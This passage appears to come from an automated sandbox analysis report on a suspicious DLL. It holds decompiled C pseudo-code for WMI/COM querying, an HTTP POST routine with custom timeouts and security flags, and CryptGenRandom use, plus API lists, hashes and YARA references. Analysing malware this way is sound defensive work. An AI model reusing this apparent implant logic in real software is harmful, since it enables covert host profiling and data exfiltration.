										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E100085D5( &_v92);
											E100085D5( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E10009640();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E100095E1(_t283, 0x219);
										E10009640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E100085D5( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E100091E3(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E1000DA20( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E1000861A( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}

0x1000db45
0x1000db4b
0x1000db52
0x1000db55
0x1000db58
0x1000db5d
0x1000db5f
0x1000db64
0x1000dfac
0x1000dfac
0x1000db71
0x1000db73
0x1000db76
0x1000db79
0x1000df91
0x1000df97
0x1000dfa1
0x00000000
0x1000dfa6
0x1000db84
0x1000db8b
0x1000db92
0x1000db95
0x1000db9a
0x1000db9c
0x1000db9f
0x1000dba2
0x1000dba3
0x1000dbac
0x1000dbb2
0x1000dbb5
0x1000dbbe
0x1000dbc3
0x1000dbc8
0x1000dbdf
0x1000dbec
0x1000dbef
0x1000dbf6
0x1000dbfb
0x1000dc02
0x1000dc07
0x1000dc0e
0x1000dc10
0x1000dc1c
0x1000dc1f
0x1000dc21
0x1000df81
0x1000df82
0x1000df8b
0x00000000
0x1000df8b
0x1000dc27
0x1000dc2a
0x1000dc2d
0x1000dc30
0x1000dc32
0x1000df4d
0x1000df50
0x1000df53
0x1000df55
0x1000df77
0x1000df7c
0x1000df57
0x1000df5a
0x1000df65
0x1000df6c
0x1000df6c
0x00000000
0x00000000
0x00000000
0x00000000
0x1000dc38
0x1000dc38
0x1000dc4a
0x1000dc4d
0x1000dc4f
0x00000000
0x00000000
0x1000dc57
0x1000dc5a
0x1000dc5d
0x1000dc60
0x1000dc63
0x1000dc66
0x00000000
0x00000000
0x1000dc6c
0x1000dc7a
0x1000dc7d
0x1000dc7f
0x1000dc98
0x1000dca7
0x1000dcaf
0x1000dcaf
0x1000dcb2
0x1000dcb9
0x1000dcbd
0x1000dcc3
0x1000dcc5
0x1000df35
0x1000df3b
0x1000df41
0x1000df44
0x1000df44
0x00000000
0x1000df44
0x1000dcd4
0x1000dce8
0x1000dcec
0x1000dcee
0x1000dcf3
0x1000df02
0x1000df08
0x1000df13
0x1000df1e
0x1000df24
0x1000df2a
0x1000df2d
0x00000000
0x1000df2d
0x1000dcf9
0x1000ded0
0x1000ded0
0x1000ded3
0x1000ded6
0x00000000
0x00000000
0x1000dd01
0x1000dd09
0x1000dd10
0x1000dd16
0x1000dd18
0x00000000
0x00000000
0x1000dd21
0x1000dd36
0x1000dd3c
0x1000dd45
0x1000dd48
0x1000dd4b
0x1000dd4d
0x1000dec3
0x1000dec6
0x1000decf
0x1000decf
0x00000000
0x1000decf
0x1000dd5d
0x1000dd60
0x1000dd67
0x1000dd6d
0x1000dd70
0x1000dd73
0x1000dd76
0x1000dd79
0x1000ddb5
0x1000ddb5
0x1000ddb8
0x1000de64
0x1000de78
0x1000de88
0x1000de8c
0x1000de8e
0x1000dea5
0x1000dea9
0x1000deb2
0x1000debd
0x00000000
0x1000debd
0x1000de94
0x1000de95
0x1000de9a
0x1000de9a
0x1000de9c
0x1000de9d
0x1000dea2
0x00000000
0x1000dea2
0x1000ddbe
0x1000ddbe
0x1000ddc1
0x1000de2c
0x1000de40
0x1000de50
0x1000de54
0x1000de56
0x00000000
0x00000000
0x1000de5c
0x1000de5d
0x00000000
0x1000de5d
0x1000ddc3
0x1000ddc3
0x1000ddc6
0x00000000
0x00000000
0x1000ddc8
0x1000ddcb
0x00000000
0x00000000
0x1000ddcd
0x1000ddcd
0x1000ddd3
0x1000ddef
0x1000ddfe
0x1000de07
0x1000de0c
0x1000de0f
0x1000de15
0x1000de15
0x1000de1a
0x1000de26
0x00000000
0x1000de26
0x1000ddd8
0x00000000
0x1000ddd8
0x1000dd7b
0x1000dda2
0x1000dda7
0x1000ddac
0x1000ddae
0x1000ddae
0x00000000
0x1000ddac
0x1000dd7d
0x1000dd7d
0x1000dd80
0x00000000
0x00000000
0x1000dd86
0x1000dd86
0x1000dd89
0x00000000
0x00000000
0x1000dd8f
0x1000dd8f
0x1000dd92
0x00000000
0x00000000
0x1000dd98
0x1000dd9b
0x00000000
0x00000000
0x1000dd9d
0x00000000
0x1000dd9d
0x1000dedf
0x1000dee5
0x1000deeb
0x1000deee
0x1000def1
0x1000def1
0x1000def4
0x1000def5
0x1000def8
0x1000defa
0x00000000
0x00000000
0x1000df4a
0x1000df4a
0x00000000
0x1000df4a
0x1000dc81
0x1000dc87
0x00000000
0x1000dc87
0x1000df47
0x00000000
0x1000dbca
0x1000dbcf
0x1000dbd4
0x00000000
0x1000dbd8

APIs

Part of subcall function 1000D523: CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
Part of subcall function 1000D523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
Part of subcall function 1000D523: CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
Part of subcall function 1000D523: SysAllocString.OLEAUT32(00000000), ref: 1000D569
Part of subcall function 1000D523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

SysAllocString.OLEAUT32(00000000), ref: 1000DBE5
SysAllocString.OLEAUT32(00000000), ref: 1000DBF9
SysFreeString.OLEAUT32(?), ref: 1000DF82
SysFreeString.OLEAUT32(?), ref: 1000DF8B

Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660

Strings

TRUE, xrefs: 1000DDA7
FALSE, xrefs: 1000DDAE

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: String$Alloc$Free$HeapInitialize$BlanketCreateInstanceProxySecurity
String ID: FALSE$TRUE
API String ID: 224402418-1412513891
Opcode ID: 95ff9ab5d061d96dc60c0cf74fe266a414f7d2914be56b1a19689f674a06e878
Instruction ID: 5411e9e7cadc0f68074cac65ab41d21575f1dfdd33ecf7b2672d11ac1b24c815
Opcode Fuzzy Hash: 95ff9ab5d061d96dc60c0cf74fe266a414f7d2914be56b1a19689f674a06e878
Instruction Fuzzy Hash: 13E16375D002199FEB15EFE4C885EEEBBB9FF48380F10415AF505AB259DB31AA01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000E668, Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 305
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E1000E668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				int _v76;
				void* _v80;
				intOrPtr _v100;
				int _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				void _v124;
				char _v140;
				void _v396;
				void _v652;
				intOrPtr _t105;
				intOrPtr _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t131;
				char _t133;
				intOrPtr _t136;
				char _t138;
				char _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				intOrPtr _t154;
				intOrPtr _t158;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr _t166;
				intOrPtr _t172;
				intOrPtr _t176;
				void* _t183;
				void* _t185;
				intOrPtr _t186;
				char _t195;
				intOrPtr _t203;
				intOrPtr _t204;
				signed int _t209;
				void _t212;
				intOrPtr _t213;
				void* _t214;
				intOrPtr _t216;
				char _t217;
				intOrPtr _t218;
				signed int _t219;
				signed int _t220;
				void* _t221;

				_v40 = _v40 & 0x00000000;
				_v24 = 4;
				_v36 = 1;
				_t214 = __edx;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_v64 = E100095C7(0x85b);
				_v60 = E100095C7(0xdc9);
				_v56 = E100095C7(0x65d);
				_v52 = E100095C7(0xdd3);
				_t105 = E100095C7(0xb74);
				_v44 = _v44 & 0;
				_t212 = 0x3c;
				_v48 = _t105;
				memset( &_v124, 0, 0x100);
				_v116 = 0x10;
				_v120 =  &_v140;
				_v124 = _t212;
				_v108 =  &_v396;
				_v104 = 0x100;
				_v80 =  &_v652;
				_push( &_v124);
				_push(0);
				_v76 = 0x100;
				_push(E1000C379(_t214));
				_t113 =  *0x1001e6a4; // 0x0
				_push(_t214);
				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
					_t209 = 0;
					_v20 = 0;
					do {
						_t115 =  *0x1001e6a4; // 0x0
						_v12 = 0x8404f700;
						_t213 =  *_t115( *0x1001e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
						if(_t213 != 0) {
							_t195 = 3;
							_t185 = 4;
							_v8 = _t195;
							_t118 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
							_v8 = 0x3a98;
							_t121 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
							_v8 = 0x493e0;
							_t124 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
							_v8 = 0x493e0;
							_t127 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
							_t131 =  *0x1001e6a4; // 0x0
							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
							if(_a24 != 0) {
								E1000980C(_a24);
							}
							if(_t186 != 0) {
								_t133 = 0x8484f700;
								if(_v112 != 4) {
									_t133 = _v12;
								}
								_t136 =  *0x1001e6a4; // 0x0
								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
								_v8 = _t216;
								if(_a24 != 0) {
									E1000980C(_a24);
								}
								if(_t216 != 0) {
									_t138 = 4;
									if(_v112 != _t138) {
										L19:
										_t139 = E100095C7(0x777);
										_t217 = _t139;
										_v12 = _t217;
										_t141 =  *0x1001e6a4; // 0x0
										_t218 = _v8;
										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E1000C379(_t217), _a4, _a8);
										E100085C2( &_v12);
										if(_a24 != 0) {
											E1000980C(_a24);
										}
										if(_v28 != 0) {
											L28:
											_v24 = 8;
											_push(0);
											_v32 = 0;
											_v28 = 0;
											_push( &_v24);
											_push( &_v32);
											_t147 =  *0x1001e6a4; // 0x0
											_push(0x13);
											_push(_t218);
											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
												_t219 = E10009749( &_v32);
												if(_t219 == 0xc8) {
													 *_a20 = _v8;
													 *_a12 = _t213;
													 *_a16 = _t186;
													return 0;
												}
												_t220 =  ~_t219;
												L32:
												_t154 =  *0x1001e6a4; // 0x0
												 *((intOrPtr*)(_t154 + 8))(_v8);
												L33:
												if(_t186 != 0) {
													_t158 =  *0x1001e6a4; // 0x0
													 *((intOrPtr*)(_t158 + 8))(_t186);
												}
												if(_t213 != 0) {
													_t203 =  *0x1001e6a4; // 0x0
													 *((intOrPtr*)(_t203 + 8))(_t213);
												}
												return _t220;
											}
											GetLastError();
											_t220 = 0xfffffff8;
											goto L32;
										} else {
											GetLastError();
											_t162 =  *0x1001e6a4; // 0x0
											 *((intOrPtr*)(_t162 + 8))(_t218);
											_t218 = 0;
											goto L23;
										}
									}
									_v12 = _t138;
									_push( &_v12);
									_push( &_v16);
									_t172 =  *0x1001e6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
										L18:
										GetLastError();
										goto L19;
									}
									_v16 = _v16 | 0x00003380;
									_push(4);
									_push( &_v16);
									_t176 =  *0x1001e6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
										goto L19;
									}
									goto L18;
								} else {
									GetLastError();
									L23:
									_t164 =  *0x1001e6a4; // 0x0
									 *((intOrPtr*)(_t164 + 8))(_t186);
									_t186 = 0;
									goto L24;
								}
							} else {
								GetLastError();
								L24:
								_t166 =  *0x1001e6a4; // 0x0
								 *((intOrPtr*)(_t166 + 8))(_t213);
								_t213 = 0;
								goto L25;
							}
						}
						GetLastError();
						L25:
						_t204 = _t218;
						_t209 = _v20 + 1;
						_v20 = _t209;
					} while (_t209 < 2);
					_v8 = _t218;
					if(_t204 != 0) {
						goto L28;
					}
					_t220 = 0xfffffffe;
					goto L33;
				}
				_t183 = 0xfffffffc;
				return _t183;
			}

0x1000e671
0x1000e683
0x1000e68c
0x1000e696
0x1000e69a
0x1000e6ab
0x1000e6c2
0x1000e6cf
0x1000e6dc
0x1000e6e9
0x1000e6ec
0x1000e6f1
0x1000e6f6
0x1000e6f8
0x1000e700
0x1000e70b
0x1000e712
0x1000e71e
0x1000e721
0x1000e72f
0x1000e732
0x1000e738
0x1000e739
0x1000e73b
0x1000e744
0x1000e745
0x1000e74a
0x1000e750
0x1000e75a
0x1000e75c
0x1000e761
0x1000e761
0x1000e770
0x1000e77f
0x1000e783
0x1000e792
0x1000e795
0x1000e79a
0x1000e79e
0x1000e7a5
0x1000e7ac
0x1000e7b4
0x1000e7bc
0x1000e7c3
0x1000e7cb
0x1000e7d3
0x1000e7da
0x1000e7e2
0x1000e7ea
0x1000e7ff
0x1000e80c
0x1000e80e
0x1000e813
0x1000e813
0x1000e81a
0x1000e82b
0x1000e830
0x1000e832
0x1000e832
0x1000e846
0x1000e858
0x1000e85a
0x1000e85d
0x1000e862
0x1000e862
0x1000e869
0x1000e878
0x1000e87c
0x1000e8ba
0x1000e8bf
0x1000e8c7
0x1000e8cc
0x1000e8d7
0x1000e8dd
0x1000e8e7
0x1000e8ea
0x1000e8f3
0x1000e8f8
0x1000e8f8
0x1000e901
0x1000e94a
0x1000e94c
0x1000e953
0x1000e954
0x1000e957
0x1000e95d
0x1000e961
0x1000e962
0x1000e967
0x1000e969
0x1000e96f
0x1000e984
0x1000e98c
0x1000e9c1
0x1000e9c6
0x1000e9cb
0x00000000
0x1000e9cd
0x1000e98e
0x1000e990
0x1000e990
0x1000e999
0x1000e99c
0x1000e99e
0x1000e9a0
0x1000e9a6
0x1000e9a6
0x1000e9ab
0x1000e9ad
0x1000e9b4
0x1000e9b4
0x00000000
0x1000e9b7
0x1000e971
0x1000e979
0x00000000
0x1000e903
0x1000e903
0x1000e909
0x1000e90f
0x1000e912
0x00000000
0x1000e912
0x1000e901
0x1000e87e
0x1000e884
0x1000e888
0x1000e889
0x1000e88e
0x1000e890
0x1000e896
0x1000e8b4
0x1000e8b4
0x00000000
0x1000e8b4
0x1000e898
0x1000e8a2
0x1000e8a4
0x1000e8a5
0x1000e8aa
0x1000e8ac
0x1000e8b2
0x00000000
0x00000000
0x00000000
0x1000e86b
0x1000e86b
0x1000e914
0x1000e914
0x1000e91a
0x1000e91d
0x00000000
0x1000e91d
0x1000e81c
0x1000e81c
0x1000e91f
0x1000e91f
0x1000e925
0x1000e928
0x00000000
0x1000e928
0x1000e81a
0x1000e785
0x1000e92a
0x1000e92d
0x1000e92f
0x1000e932
0x1000e935
0x1000e93e
0x1000e943
0x00000000
0x00000000
0x1000e947
0x00000000
0x1000e947
0x1000e754
0x00000000

APIs

memset.MSVCRT ref: 1000E69A
memset.MSVCRT ref: 1000E6AB
memset.MSVCRT ref: 1000E700
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 1000E785

Strings

POST, xrefs: 1000E84B

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memset$ErrorLast
String ID: POST
API String ID: 2570506013-1814004025
Opcode ID: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
Instruction ID: 0700470c0a68c42d93125f8ed8f5d74d0b9e7f5cef555f12c6cb43bca8eeeaa5
Opcode Fuzzy Hash: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
Instruction Fuzzy Hash: ACB14CB1900258AFEB55CFA4CC88E9E7BF8EF48390F108069F505EB291DB749E44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100116B8, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E100116B8(signed int* _a4) {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				char _v20;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				void* _t22;
				intOrPtr* _t28;
				signed int _t29;
				signed int _t30;
				struct HINSTANCE__* _t32;
				void* _t34;

				_t30 = 0;
				_v8 = 0;
				_t32 = GetModuleHandleA("advapi32.dll");
				if(_t32 == 0) {
					L9:
					return 1;
				}
				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
				_v12 = _t16;
				if(_t16 == 0) {
					goto L9;
				}
				_t17 = GetProcAddress(_t32, "CryptGenRandom");
				_v16 = _t17;
				if(_t17 == 0) {
					goto L9;
				}
				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
				if(_t28 == 0) {
					goto L9;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if(_v12() == 0) {
					goto L9;
				}
				_t22 = _v16(_v8, 4,  &_v20);
				 *_t28(_v8, 0);
				if(_t22 == 0) {
					goto L9;
				}
				_t29 = 0;
				do {
					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
					_t29 = _t29 + 1;
				} while (_t29 < 4);
				 *_a4 = _t30;
				return 0;
			}

0x100116c1
0x100116c8
0x100116d1
0x100116d5
0x10011750
0x00000000
0x10011752
0x100116e3
0x100116e5
0x100116ea
0x00000000
0x00000000
0x100116f2
0x100116f4
0x100116f9
0x00000000
0x00000000
0x10011703
0x10011707
0x00000000
0x00000000
0x10011709
0x1001170e
0x10011710
0x10011711
0x10011715
0x1001171b
0x00000000
0x00000000
0x10011726
0x1001172f
0x10011733
0x00000000
0x00000000
0x10011735
0x10011737
0x1001173f
0x10011741
0x10011742
0x1001174a
0x00000000

APIs

GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,1000765A,?,?,00000000,?), ref: 100116CB
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 100116E3
GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 100116F2
GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 10011701

Strings

CryptReleaseContext, xrefs: 100116FB
CryptAcquireContextA, xrefs: 100116DD
advapi32.dll, xrefs: 100116C3
CryptGenRandom, xrefs: 100116EC

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
API String ID: 667068680-129414566
Opcode ID: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
Instruction ID: d36a475728834fa58dcafee8eb85b3ba20c501ff2e9645169ff1056c09a1da39
Opcode Fuzzy Hash: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
Instruction Fuzzy Hash: 57117735D04615BBDB52DBAA8C84EEF7BF9EF45680F010064EA15FA240DB30DB408764

Uniqueness

Uniqueness Score: -1.00%

Function 10012122, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E10012122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				int _t15;
				char* _t24;
				char* _t26;
				char* _t28;
				char* _t29;
				signed int _t40;
				char* _t43;
				char* _t45;
				long long* _t47;

				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t26 = _a4;
				_push(_t30);
				 *_t47 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t26);
				L10012285();
				_t40 = _t12;
				if(_t40 < 0 || _t40 >= _a8) {
					L19:
					_t13 = _t12 | 0xffffffff;
					goto L20;
				} else {
					L100122CD();
					_t15 =  *((intOrPtr*)( *_t12));
					if(_t15 != 0x2e) {
						_t24 = strchr(_t26, _t15);
						if(_t24 != 0) {
							 *_t24 = 0x2e;
						}
					}
					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
						L11:
						_t43 = strchr(_t26, 0x65);
						_t28 = _t43;
						if(_t43 == 0) {
							L18:
							_t13 = _t40;
							L20:
							return _t13;
						}
						_t45 = _t43 + 1;
						_t29 = _t28 + 2;
						if( *_t45 == 0x2d) {
							_t45 = _t29;
						}
						while( *_t29 == 0x30) {
							_t29 = _t29 + 1;
						}
						if(_t29 != _t45) {
							E10008706(_t45, _t29, _t40 - _t29 + _a4);
							_t40 = _t40 + _t45 - _t29;
						}
						goto L18;
					} else {
						_t6 = _t40 + 3; // 0x100109b2
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L19;
						}
						_t26[_t40] = 0x302e;
						( &(_t26[2]))[_t40] = 0;
						_t40 = _t40 + 2;
						goto L11;
					}
				}
			}

0x10012125
0x1001212a
0x1001212e
0x1001212e
0x10012133
0x10012138
0x10012139
0x1001213c
0x1001213d
0x10012142
0x10012145
0x10012146
0x1001214b
0x10012152
0x100121f8
0x100121f8
0x00000000
0x10012161
0x10012161
0x10012168
0x1001216c
0x10012173
0x1001217c
0x1001217e
0x1001217e
0x1001217c
0x1001218d
0x100121b3
0x100121bc
0x100121be
0x100121c4
0x100121f3
0x100121f3
0x100121fb
0x100121fe
0x100121fe
0x100121c6
0x100121c7
0x100121cd
0x100121cf
0x100121cf
0x100121d4
0x100121d3
0x100121d3
0x100121db
0x100121e7
0x100121f1
0x100121f1
0x00000000
0x1001219d
0x1001219d
0x1001219d
0x100121a3
0x00000000
0x00000000
0x100121a5
0x100121ab
0x100121b0
0x00000000
0x100121b0
0x1001218d

APIs

_snprintf.MSVCRT ref: 10012146
localeconv.MSVCRT ref: 10012161
strchr.MSVCRT ref: 10012173
strchr.MSVCRT ref: 10012184
strchr.MSVCRT ref: 10012192
strchr.MSVCRT ref: 100121B7

Strings

%.*g, xrefs: 1001213D

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: strchr$_snprintflocaleconv
String ID: %.*g
API String ID: 1910550357-952554281
Opcode ID: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
Instruction ID: 8636af6e6c8ef7ea176c693fecce787b547d9a6025bf48258b91e4e7d6eda4ac
Opcode Fuzzy Hash: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
Instruction Fuzzy Hash: 562138FA6046567AD311CA689CC6B5E3BDCDF15260F250115FE509E182E674ECF483A0

Uniqueness

Uniqueness Score: -1.00%

Function 100102B2, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON

Download Yara Rule

APIs

_snprintf.MSVCRT ref: 10010332
qsort.MSVCRT ref: 100105B0

Strings

true, xrefs: 10010309
%I64d, xrefs: 10010324
false, xrefs: 10010315
null, xrefs: 100102F7

Memory Dump Source

Source File: 00000005.00000002.544922565.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.544905662.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _snprintfqsort
String ID: %I64d$false$null$true
API String ID: 756996078-4285102228
Opcode ID: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
Instruction ID: b3da69db5d3f4e878d7882629df3b6b2364259ca5c53272952ed0c313758977d
Opcode Fuzzy Hash: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
Instruction Fuzzy Hash: BCE150B1A0024ABBDF11DE64CC45EEF3BA9EF45384F108015FD549E141EBB5EAE19BA0

Uniqueness

Uniqueness Score: -1.00%

Function 10004A0B, Relevance: 9.3, APIs: 6, Instructions: 285
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E10004A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				char _v516;
				void _v1044;
				char _v1076;
				signed int _v1080;
				signed int _v1096;
				WCHAR* _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				char _v1144;
				char _v1148;
				void* __esi;
				intOrPtr _t66;
				intOrPtr _t73;
				signed int _t75;
				intOrPtr _t76;
				signed int _t81;
				WCHAR* _t87;
				void* _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				WCHAR* _t96;
				intOrPtr _t106;
				intOrPtr _t107;
				void* _t108;
				intOrPtr _t109;
				signed char _t116;
				WCHAR* _t118;
				void* _t122;
				signed int _t123;
				intOrPtr _t125;
				void* _t128;
				void* _t129;
				WCHAR* _t130;
				void* _t134;
				void* _t141;
				void* _t143;
				WCHAR* _t145;
				signed int _t153;
				void* _t154;
				void* _t178;
				signed int _t180;
				void* _t181;
				void* _t183;
				void* _t187;
				signed int _t188;
				WCHAR* _t190;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t196;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;
				intOrPtr* _t203;
				void* _t208;

				_t208 = __fp0;
				_push(_t191);
				_t128 = __edx;
				_t187 = __ecx;
				_t192 = _t191 | 0xffffffff;
				memset( &_v1044, 0, 0x20c);
				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
				_v1108 = 1;
				if(_t187 != 0) {
					_t123 =  *0x1001e688; // 0x2da0590
					_t125 =  *0x1001e68c; // 0x2e1fc68
					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
				}
				if(E1000BB8D(_t187) != 0) {
					L4:
					_t134 = _t128;
					_t66 = E1000B7A8(_t134,  &_v516);
					_push(_t134);
					_v1104 = _t66;
					E1000B67D(_t66,  &_v1076, _t206, _t208);
					_t129 = E100049C7( &_v1076,  &_v1076, _t206);
					_t141 = E1000D400( &_v1076, E1000C379( &_v1076), 0);
					E1000B88A(_t141,  &_v1100, _t208);
					_t175 =  &_v1076;
					_t73 = E10002C8F(_t187,  &_v1076, _t206, _t208);
					_v1112 = _t73;
					_t143 = _t141;
